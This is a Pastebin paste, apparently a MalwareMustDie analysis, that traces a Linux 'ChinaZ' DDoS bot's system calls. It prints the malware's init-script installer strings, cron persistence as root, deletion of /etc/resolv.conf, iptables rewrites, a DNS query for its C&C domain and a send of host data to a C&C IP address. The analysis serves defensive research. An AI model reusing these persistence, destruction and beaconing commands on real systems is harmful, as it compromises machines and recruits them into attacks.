Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # MalwareMustDie! ChinaZ Initial execution calls &
- # Networking commands
- /////////////////////////
- //
- // COMMAND EXECUTION
- //
- /////////////////////////
- // run..
- execve("./SAMPLE"["./SAMPLE"] )
- // self copy...to /tmp with the dull name with "chinaz" in it..
- uname()
- chdir("/tmp")
- readlink("/proc/self/exe", "/home/YOU/test/SAMPLE", 256)
- open("/home/YOU/test/SAMPLE", O_RDONLY)
- open("/tmp/.chinaz{1434745889", O_WRONLY|O_CREAT, 0777)
- read(0, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\2\0\3\0\1\0\0\0\360\201\4\0104\0\0\0"..., 4096)
- write(1, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\2\0\3\0\1\0\0\0\360\201\4\0104\0\0\0"..., 4096)
- //installer..
- #!/bin/sh\n# chkconfig: 12345 90 90\n# description: %s\n### BEGIN INIT INFO\n# Provides:\t\t%s\n# Required-Start:\t\n# Required-Stop:\t\n# Default-Start:\t1 2 3 4 5\n# Default-Stop:\t\t\n# Short-Description:\t%s\n### END INIT INFO\ncase $1 in\nstart)\n\t%s\n\t;;\nstop)\n\t;;\n*)\n\t%s\n\t;;\nesac\n
- #!/bin/sh\nPATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin\nfor i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done\ncp /lib/udev/udev /lib/udev/debug\n/lib/udev/debug\n
- // setting runtime for self copied malware file...
- execve("/usr/local/bin/chkconfig"["chkconfig""--add"".chinaz{1434744983"] )
- execve("/usr/bin/chkconfig"["chkconfig""--add"".chinaz{1434744983"] )
- execve("/bin/chkconfig"["chkconfig""--add"".chinaz{1434744983"] )
- execve("/usr/local/games/chkconfig"["chkconfig""--add"".chinaz{1434744983"] )
- execve("/usr/games/chkconfig"["chkconfig""--add"".chinaz{1434744983"] )
- execve("/usr/local/bin/update-rc.d"["update-rc.d"".chinaz{1434744983""defaults"] )
- execve("/usr/bin/update-rc.d"["update-rc.d"".chinaz{1434744983""defaults"] )
- execve("/bin/update-rc.d"["update-rc.d"".chinaz{1434744983""defaults"] )
- execve("/usr/local/games/update-rc.d"["update-rc.d"".chinaz{1434744983""defaults"] )
- execve("/usr/games/update-rc.d"["update-rc.d"".chinaz{1434744983""defaults"] )
- execve("/usr/local/bin/update-rc.d"["update-rc.d""SAMPLE""remove"] )
- execve("/usr/bin/update-rc.d"["update-rc.d""SAMPLE""remove"] )
- execve("/bin/update-rc.d"["update-rc.d""SAMPLE""remove"] )
- // deleting the original sample...
- execve("/usr/local/games/update-rc.d"["update-rc.d""SAMPLE""remove"] )
- execve("/usr/games/update-rc.d"["update-rc.d""SAMPLE""remove"] )
- execve("/usr/local/bin/chkconfig"["chkconfig""--del""SAMPLE"] )
- execve("/usr/bin/chkconfig"["chkconfig""--del""SAMPLE"] )
- execve("/bin/chkconfig"["chkconfig""--del""SAMPLE"] )
- execve("/usr/local/games/chkconfig"["chkconfig""--del""SAMPLE"] )
- execve("/usr/games/chkconfig"["chkconfig""--del""SAMPLE"] )
- // setting cron...
- execve("/bin/sh"["sh""-c""sed -i '/\\/etc\\/cron.hourly\\/cron.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/cron.sh' >> /etc/crontab"...] )
- execve("/bin/sed"["sed -i '/\\/etc\\/cron.hourly\\/cron.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/cron.sh' >> /etc/crontab"] )
- // deleting your resolve.conf...YES..LITERALLY!
- execve("/bin/sh"["sh""-c""rm -rf /etc/resolv.conf"] )
- execve("/bin/rm"["rm""-rf""/etc/resolv.conf"] )
- // installing the config..
- execve("/bin/sh"["sh""-c""touch /home/YOU/ConfigDatecz"] )
- execve("/usr/bin/touch"["touch""/home/YOU/ConfigDatecz"] )
- // resetting iptables & setting the malicious purpose one
- execve("/bin/sh"["sh""-c""whoami"] )
- execve("/bin/sh"["sh""-c""iptables --flush"]
- execve("/usr/bin/whoami"["whoami"] )
- execve("/bin/sh"["sh""-c""iptables -A OUTPUT -p tcp --dport %d -j DROP"...]
- execve("/bin/sh"["sh""-c""whoami"] )
- execve("/usr/bin/whoami"["whoami"] )
- execve("/bin/sh"["sh""-c""iptables -A OUTPUT -p tcp --dport %d -j DROP"...] )
- execve("/bin/sh"["sh""-c""iptables -A OUTPUT -p tcp --dport %d -j DROP"...] )
- execve("/bin/sh"["sh""-c""iptables -A OUTPUT -p tcp --dport %d -j DROP"...] )
- execve("/bin/sh"["sh""-c""iptables -A OUTPUT -p tcp --dport %d -j DROP"...] )
- execve("/bin/sh"["sh""-c""iptables -A OUTPUT -p tcp --dport %d -j DROP"...] )
- (...)
- /////////////////////////
- //
- // NETWORKING
- //
- /////////////////////////
- // the checking of the loopback, local and global ethernet interface, for the iptables operations..
- socket(PF_INET, SOCK_DGRAM, IPPROTO_IP)
- {{"lo", {AF_INET, inet_addr("127.0.0.1")}},
- {"eth0", {AF_INET, inet_addr("a,b,c,d")}},
- {"ethn", {AF_INET, inet_addr("w,x,y,z")}}}})
- // Kick DNS to request CNC domain...
- socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
- open("/etc/resolv.conf", O_RDONLY)
- read(4, "nameserver DNS-ADDRESS\nnameser"..., 4096)
- socket(PF_INET, SOCK_DGRAM|SOCK_NONBLOCK, IPPROTO_IP)
- connect(4, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("DNS-ADDRESS")}
- send(4, "\5\237\1\0\0\1\0\0\0\0\0\0\3www\5avttx\2cn\0\0\1\0\1", 30, MSG_NOSIGNAL)
- recvfrom(4, "\5\237\201\200\0\1\0\1\0\2\0\6\3www\5avttx\2cn\0\0\1\0\1\300\f"
- {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("DNS-ADDRESS")}
- // sending your hostname & etc uname infos to the CNC..
- connect(3, {sa_family=AF_INET, sin_port=htons(60000), sin_addr=inet_addr("121.42.159.37")}
- send(-1, "ThisIsNotLinux\0\0\0\0\0\0\0\0\0\0\0\0"..., 372, 0)
- // PS: Upon succcess the connection the Config.ini file wil be saved.
- And the system will be rebooted and ready to be functioned as a ddoser bot.
- # end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement